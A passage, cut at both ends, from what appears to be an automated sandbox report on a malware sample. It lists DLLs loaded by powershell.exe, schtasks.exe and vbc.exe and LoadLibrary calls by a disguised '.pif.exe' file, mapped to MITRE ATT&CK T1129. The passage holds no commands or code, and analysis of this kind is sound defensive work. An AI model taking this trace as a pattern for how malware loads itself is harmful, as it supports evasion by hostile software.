\"powershell.exe\" loaded module \"AMSI.DLL\" at base 0\n \"powershell.exe\" loaded module \"%WINDIR%\\SYSTEM32\\CRYPT32.DLL\" at base 75410000\n \"powershell.exe\" loaded module \"IMM32.DLL\" at base 77620000\n \"powershell.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHEXT.DLL\" at base 72010000\n \"powershell.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WINDOWSPOWERSHELL\\V1.0\\PWRSHSIP.DLL\" at base 72000000\n \"powershell.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_MSIL\\SYSTEM\\V4.0_4.0.0.0__B77A5C561934E089\\NTDLL.DLL\" at base 0\n \"powershell.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM.DATA\\DF2DD09ED7C341842A104E1E668F184E\\SYSTEM.DATA.NI.DLL\" at base 5ff00000\n \"powershell.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_32\\SYSTEM.DATA\\V4.0_4.0.0.0__B77A5C561934E089\\SYSTEM.DATA.DLL\" at base 5fba0000\n \"powershell.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM.XML\\15AF16D373CF0528CB74FC73D365FDBF\\SYSTEM.XML.NI.DLL\" at base 62210000\n \"powershell.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM.MANAGEMENT\\E114780FD3EA5727401C06EA4F22EF35\\SYSTEM.MANAGEMENT.NI.DLL\" at base 6a3d0000\n \"powershell.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM.DIRED13B18A9#\\2E76676FBD265F70BE92C82BBF76B8E5\\SYSTEM.DIRECTORYSERVICES.NI.DLL\" at base 5fa70000\n \"powershell.exe\" loaded module \"API-MS-WIN-CORE-XSTATE-L2-1-0.DLL\" at base 71d90000\n \"powershell.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\CLRJIT.DLL\" at base 6aff0000\n \"powershell.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\MICROSOFT.P6F792626#\\05765F777020DEEDDC8AD54B48343B9C\\MICROSOFT.POWERSHELL.SECURITY.NI.DLL\" at base 6c740000\n \"powershell.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\MICROSOFT.MF49F6405#\\F0821980BFE2FC8375CCFC37DBE6E9D8\\MICROSOFT.MANAGEMENT.INFRASTRUCTURE.NI.DLL\" at base 6b5b0000\n \"powershell.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM.CONFIGURATION\\96F7EDB07B12303F0EC2595C7F3778C7\\SYSTEM.CONFIGURATION.NI.DLL\" at base 6aee0000\n \"powershell.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM.TRANSACTIONS\\3D760B4A3260A41EF84A3FD866780980\\SYSTEM.TRANSACTIONS.NI.DLL\" at base 5f9b0000\n \"powershell.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM.NUMERICS\\E7D6ED984300C7212C6E682C4F730B1E\\SYSTEM.NUMERICS.NI.DLL\" at base 6ac90000\n \"powershell.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_32\\SYSTEM.TRANSACTIONS\\V4.0_4.0.0.0__B77A5C561934E089\\SYSTEM.TRANSACTIONS.DLL\" at base 6abe0000\n \"powershell.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_32\\MSCORLIB\\V4.0_4.0.0.0__B77A5C561934E089\\SECUR32.DLL\" at base 0\n \"powershell.exe\" loaded module \"SECUR32.DLL\" at base 75030000\n \"powershell.exe\" loaded module \"SSPICLI.DLL\" at base 75180000\n \"powershell.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_MSIL\\SYSTEM.MANAGEMENT.AUTOMATION\\V4.0_3.0.0.0__31BF3856AD364E35\\SHLWAPI.DLL\" at base 0\n \"powershell.exe\" loaded module \"SHLWAPI.DLL\" at base 75f50000\n \"powershell.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\MICROSOFT.CSHARP\\F73F48AFB5512225DEDAEE9C88AC5050\\MICROSOFT.CSHARP.NI.DLL\" at base 5f810000\n \"powershell.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 74030000\n \"powershell.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 75d20000\n \"powershell.exe\" loaded module \"RPCRTREMOTE.DLL\" at base 75290000\n \"powershell.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\MICROSOFT.M870D558A#\\7CEB6B903321C16B12386A8DF1BE50F9\\MICROSOFT.MANAGEMENT.INFRASTRUCTURE.NATIVE.NI.DLL\" at base 6a550000\n \"powershell.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\MICROSOFT.PAE3498D9#\\8DCF1DAED985F481EED5CCA9D2945C18\\MICROSOFT.POWERSHELL.COMMANDS.MANAGEMENT.NI.DLL\" at base 5f630000\n \"powershell.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM.CONFE64A9051#\\1561B93D6D25C4A9C3E2659AB29A5E73\\SYSTEM.CONFIGURATION.INSTALL.NI.DLL\" at base 6cb30000\n \"powershell.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\URLMON.DLL\" at base 0\n \"powershell.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L1-1-0.DLL\" at base 75570000\n \"powershell.exe\" loaded module \"URLMON.DLL\" at base 75a40000\n \"powershell.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL\" at base 753b0000\n \"powershell.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L2-1-0.DLL\" at base 714b0000\n \"powershell.exe\" loaded module \"NCRYPT.DLL\" at base 74e30000\n \"powershell.exe\" loaded module \"%WINDIR%\\SYSTEM32\\BCRYPTPRIMITIVES.DLL\" at base 749d0000\n \"powershell.exe\" loaded module \"USERENV.DLL\" at base 75610000\n \"powershell.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 75d20000\n \"powershell.exe\" loaded module \"GPAPI.DLL\" at base 748d0000\n \"powershell.exe\" loaded module \"API-MS-WIN-SERVICE-MANAGEMENT-L1-1-0.DLL\" at base 75d20000\n \"powershell.exe\" loaded module \"API-MS-WIN-SERVICE-MANAGEMENT-L2-1-0.DLL\" at base 75d20000\n \"powershell.exe\" loaded module \"%WINDIR%\\SYSTEM32\\CRYPTNET.DLL\" at base 71970000\n \"powershell.exe\" loaded module \"CRYPTNET.DLL\" at base 71970000\n \"powershell.exe\" loaded module \"SENSAPI.DLL\" at base 71d70000\n \"powershell.exe\" loaded module \"WINHTTP.DLL\" at base 716a0000\n \"powershell.exe\" loaded module \"WS2_32.DLL\" at base 756c0000\n \"powershell.exe\" loaded module \"CREDSSP.DLL\" at base 749c0000\n \"powershell.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSWSOCK.DLL\" at base 74cc0000\n \"powershell.exe\" loaded module \"WSHTCPIP\" at base 74820000\n \"powershell.exe\" loaded module \"WSHIP6.DLL\" at base 74cb0000\n \"powershell.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHQOS.DLL\" at base 71b20000\n \"powershell.exe\" loaded module \"IPHLPAPI.DLL\" at base 73640000\n \"powershell.exe\" loaded module \"DHCPCSVC6.DLL\" at base 73510000\n \"powershell.exe\" loaded module \"DHCPCSVC.DLL\" at base 734f0000\n \"powershell.exe\" loaded module \"NSI.DLL\" at base 75d00000\n \"powershell.exe\" loaded module \"CFGMGR32.DLL\" at base 755e0000\n \"powershell.exe\" loaded module \"API-MS-WIN-SERVICE-WINSVC-L1-1-0.DLL\" at base 75d20000\n \"powershell.exe\" loaded module \"PROFAPI.DLL\" at base 75300000\n \"powershell.exe\" loaded module \"DNSAPI.DLL\" at base 74b80000\n \"powershell.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHTCPIP.DLL\" at base 74820000\n \"powershell.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHIP6.DLL\" at base 74cb0000\n \"powershell.exe\" loaded module \"RASADHLP.DLL\" at base 714a0000\n \"powershell.exe\" loaded module \"%WINDIR%\\SYSTEM32\\FWPUCLNT.DLL\" at base 73570000\n \"powershell.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_MSIL\\SYSTEM\\V4.0_4.0.0.0__B77A5C561934E089\\CRYPT32.DLL\" at base 0\n \"powershell.exe\" loaded module \"CRYPT32.DLL\" at base 75410000\n \"powershell.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\CRYPT32.DLL\" at base 0\n \"powershell.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\DIASYMREADER.DLL\" at base 6a760000\n \"powershell.exe\" loaded module \"GDI32.DLL\" at base 77540000\n \"powershell.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_32\\MSCORLIB\\V4.0_4.0.0.0__B77A5C561934E089\\BCRYPT.DLL\" at base 0\n \"powershell.exe\" loaded module \"BCRYPT.DLL\" at base 74e10000\n \"powershell.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\DIASYMREADER.DLL\" at base 6a870000\n \"schtasks.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70ec0000\n \"schtasks.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"schtasks.exe\" loaded module \"KERNEL32\" at base 75d40000\n \"schtasks.exe\" loaded module \"VERSION.DLL\" at base 74790000\n \"schtasks.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"schtasks.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c900000\n \"schtasks.exe\" loaded module \"KERNEL32.DLL\" at base 75d40000\n \"schtasks.exe\" loaded module \"CRYPTBASE.DLL\" at base 751f0000\n \"schtasks.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 74030000\n \"schtasks.exe\" loaded module \"RPCRT4.DLL\" at base 758f0000\n \"schtasks.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 75d20000\n \"schtasks.exe\" loaded module \"ADVAPI32.DLL\" at base 771a0000\n \"schtasks.exe\" loaded module \"CLBCATQ.DLL\" at base 75630000\n \"schtasks.exe\" loaded module \"%WINDIR%\\SYSTEM32\\TASKSCHD.DLL\" at base 73910000\n \"schtasks.exe\" loaded module \"SSPICLI.DLL\" at base 75180000\n \"vbc.exe\" loaded module \"RPCRT4.DLL\" at base 758f0000\n \"vbc.exe\" loaded module \"API-MS-WIN-CORE-SYSINFO-L1-2-1\" at base 0\n \"vbc.exe\" loaded module \"KERNEL32.DLL\" at base 75d40000\n \"vbc.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WS2_32\" at base 756c0000\n \"vbc.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSWSOCK.DLL\" at base 74cc0000\n \"vbc.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHTCPIP.DLL\" at base 74820000\n \"vbc.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHIP6.DLL\" at base 74cb0000\n \"vbc.exe\" loaded module \"DNSAPI.DLL\" at base 74b80000\n \"vbc.exe\" loaded module \"IPHLPAPI.DLL\" at base 73640000\n \"vbc.exe\" loaded module \"RASADHLP.DLL\" at base 714a0000\n \"vbc.exe\" loaded module \"%WINDIR%\\SYSTEM32\\FWPUCLNT.DLL\" at base 73570000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"PCGB2GtVYuBR0mw.pif.exe\" called \"LoadLibrary\" with a parameter gdi32.dll (UID: 00000000-00002912)\n \"PCGB2GtVYuBR0mw.pif.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\IMM32.DLL (UID: 00000000-00002912)\n \"PCGB2GtVYuBR0mw.pif.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002912)\n \"PCGB2GtVYuBR0mw.pif.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002912)\n \"PCGB2GtVYuBR0mw.pif.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002912)\n \"PCGB2GtVYuBR0mw.pif.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002912)\n \"PCGB2GtVYuBR0mw.pif.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002912)\n \"PCGB2GtVYuBR0mw.pif.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll (UID: 00000000-00002912)\n \"PCGB2GtVYuBR0mw.pif.exe\" called \"LoadLibrary\" with a parameter SHLWAPI.dll (UID: 00000000-00002912)\n \"PCGB2GtVYuBR0mw.pif.exe\" called \"LoadLibrary\" with a parameter api-ms-win-appmodel-runtime-l1-1-2.dll (UID: 00000000-00002912)\n \"PCGB2GtVYuBR0mw.pif.exe\" called \"LoadLibrary\" with a parameter api-ms-win-appmodel-runtime-l1-1-0.dll (UID: 00000000-00002912)\n \"PCGB2GtVYuBR0mw.pif.exe\" called \"LoadLibrary\" with a parameter VERSION.dll (UID: 00000000-00002912)\n \"PCGB2GtVYuBR0mw.pif.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll (UID: 00000000-00002912)\n \"PCGB2GtVYuBR0mw.pif.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00002912)\n \"PCGB2GtVYuBR0mw.pif.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-quirks-l1-1-0.dll (UID: 00000000-00002912)\n \"PCGB2GtVYuBR0mw.pif.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscoree.dll (UID: 00000000-00002912)\n \"PCGB2GtVYuBR0mw.pif.exe\" called \"LoadLibrary\" with a parameter mscoree.dll (UID: 00000000-00002912)\n \"PCGB2GtVYuBR0mw.pif.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\combase.dll (UID: 00000000-00002912)\n \"PCGB2GtVYuBR0mw.pif.exe\" called \"LoadLibrary\" with a parameter psapi.dll (UID: 00000000-00002912)\n \"PCGB2GtVYuBR0mw.pif.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll (UID: 00000000-00002912)\n \"PCGB2GtVYuBR0mw.pif.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\ole32.dll (UID: 00000000-00002912)\n \"PCGB2GtVYuBR0mw.pif.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00002912)\n \"PCGB2GtVYuBR0mw.pif.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00002912)\n \"PCGB2GtVYuBR0mw.pif.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-xstate-l2-1-0.dll (UID: 00000000-00002912)\n \"PCGB2GtVYuBR0mw.pif.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clrjit.dll (UID: 00000000-00002912)\n \"PCGB2GtVYuBR0mw.pif.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System\\2c3c912ea8f058f9d04c4650128feb3f\\System.ni.dll (UID: 00000000-00002912)\n \"PCGB2GtVYuBR0mw.pif.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Drawing\\f7568d7f1b9d356f64779b4c0927cfb3\\System.Drawing.ni.dll (UID: 00000000-00002912)\n \"PCGB2GtVYuBR0mw.pif.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Windows.Forms\\c9a4cbc00f690a9e3cddfc400f6e85bb\\System.Windows.Forms.ni.dll (UID: 00000000-00002912)\n \"PCGB2GtVYuBR0mw.pif.exe\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00002912)\n \"PCGB2GtVYuBR0mw.pif.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00002912)\n \"PCGB2GtVYuBR0mw.pif.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Windows.Forms\\v4.0_4.0.0.0__b77a5c561934e089\\uxtheme.dll (UID: 00000000-00002912)\n \"PCGB2GtVYuBR0mw.pif.exe\" called \"LoadLibrary\" with a parameter uxtheme.dll (UID: 00000000-00002912)\n \"PCGB2GtVYuBR0mw.pif.exe\" called \"LoadLibrary\" with a parameter user32.dll (UID: 00000000-00002912)\n \"PCGB2GtVYuBR0mw.pif.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\31fae3290fad30c31c98651462d22724\\System.Core.ni.dll (UID: 00000000-00002912)\n \"PCGB2GtVYuBR0mw.pif.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\96f7edb07b12303f0ec2595c7f3778c7\\System.Configuration.ni.dll (UID: 00000000-00002912)\n \"PCGB2GtVYuBR0mw.pif.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\15af16d373cf0528cb74fc73d365fdbf\\System.Xml.ni.dll (UID: 00000000-00002912)\n \"PCGB2GtVYuBR0mw.pif.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\nlssorting.dll (UID: 00000000-00002912)\n \"PCGB2GtVYuBR0mw.pif.exe\" called \"LoadLibrary\" with a parameter ntdll.dll (UID: 00000000-00002912)\n \"PCGB2GtVYuBR0mw.pif.exe\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00002912)\n \"PCGB2GtVYuBR0mw.pif.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\bcrypt.dll (UID: 00000000-00002912)\n \"PCGB2GtVYuBR0mw.pif.exe\" called \"LoadLibrary\" with a parameter bcrypt.dll (UID: 00000000-00002912)\n \"PCGB2GtVYuBR0mw.pif.exe\" called \"LoadLibrary\" with a parameter CRYPTSP.dll (UID: 00000000-00002912)\n \"PCGB2GtVYuBR0mw.pif.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00002912)\n \"PCGB2GtVYuBR0mw.pif.exe\" called \"LoadLibrary\" with a parameter imm32.dll (UID: 00000000-00002912)\n \"PCGB2GtVYuBR0mw.pif.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00002912)\n \"PCGB2GtVYuBR0mw.pif.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\Microsoft.V9921e851#\\a891970b44db9e340c3ef3efa95b793c\\Microsoft.VisualBasic.ni.dll (UID: 00000000-00002912)\n \"PCGB2GtVYuBR0mw.pif.exe\" called \"LoadLibrary\" with a parameter gdiplus.dll (UID: 00000000-00002912)\n \"PCGB2GtVYuBR0mw.pif.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\WinSxS\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.23894_none_5c0be957a009922e\\gdiplus.dll (UID: 00000000-00002912)\n \"PCGB2GtVYuBR0mw.pif.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00002912)\n \"PCGB2GtVYuBR0mw.pif.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\en-US\\mscorrc.dll (UID: 00000000-00002912)\n \"PCGB2GtVYuBR0mw.pif.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\en\\mscorrc.dll (UID: 00000000-00002912)\n \"PCGB2GtVYuBR0mw.pif.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscorrc.dll (UID: 00000000-00002912)\n \"PCGB2GtVYuBR0mw.pif.exe\" called \"LoadLibrary\" with a parameter WindowsCodecs.dll (UID: 00000000-00002912)\n \"PCGB2GtVYuBR0mw.pif.exe\" called \"LoadLibrary\" with a parameter amsi.dll (UID: 00000000-00002912)\n \"PCGB2GtVYuBR0mw.pif.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\IconCodecService.dll (UID: 00000000-00002912)\n \"PCGB2GtVYuBR0mw.pif.exe\" called \"LoadLibrary\" with a parameter ntdll (UID: 00000000-00002912)\n \"PCGB2GtVYuBR0mw.pif.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\ntdll.dll (UID: 00000000-00002912)\n \"PCGB2GtVYuBR0mw.pif.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\shell32.dll (UID: 00000000-00002912)\n \"PCGB2GtVYuBR0mw.pif.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00002912)\n \"PCGB2GtVYuBR0mw.pif.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00002912)\n \"PCGB2GtVYuBR0mw.pif.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00002912)\n \"PCGB2GtVYuBR0mw.pif.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l1-1-0.dll (UID: 00000000-00002912)\n \"PCGB2GtVYuBR0mw.pif.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00002912)\n \"PCGB2GtVYuBR0mw.pif.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL (UID: 00000000-00002912)\n \"PCGB2GtVYuBR0mw.pif.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00002912)\n \"PCGB2GtVYuBR0mw.pif.exe\" called \"LoadLibrary\" with a parameter SspiCli.dll (UID: 00000000-00002912)\n \"PCGB2GtVYuBR0mw.pif.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00002912)\n \"PCGB2GtVYuBR0mw.pif.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\psapi.dll (UID: 00000000-00002912)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter api-ms-win-appmodel-runtime-l1-1-2.dll (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter api-ms-win-appmodel-runtime-l1-1-0.dll (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter VERSION.dll (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-quirks-l1-1-0.dll (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscoree.dll (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter mscoree.dll (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\combase.dll (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter psapi.dll (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\ole32.dll (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\oleaut32.dll (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter oleaut32.dll (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System\\2c3c912ea8f058f9d04c4650128feb3f\\System.ni.dll (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\31fae3290fad30c31c98651462d22724\\System.Core.ni.dll (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\Microsoft.Pb378ec07#\\d254c63bedcb76c81c3125bd527b7d1a\\Microsoft.PowerShell.ConsoleH (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter CRYPTSP.dll (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\OLEAUT32.dll (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Manaa57fc8cc#\\73a1a80aed03e789a49cec899b7505dd\\System.Management.Automation. (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter ntdll.dll (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter version.dll (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\nlssorting.dll (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automatio (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\psapi.dll (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\shell32.dll (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter user32.dll (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter 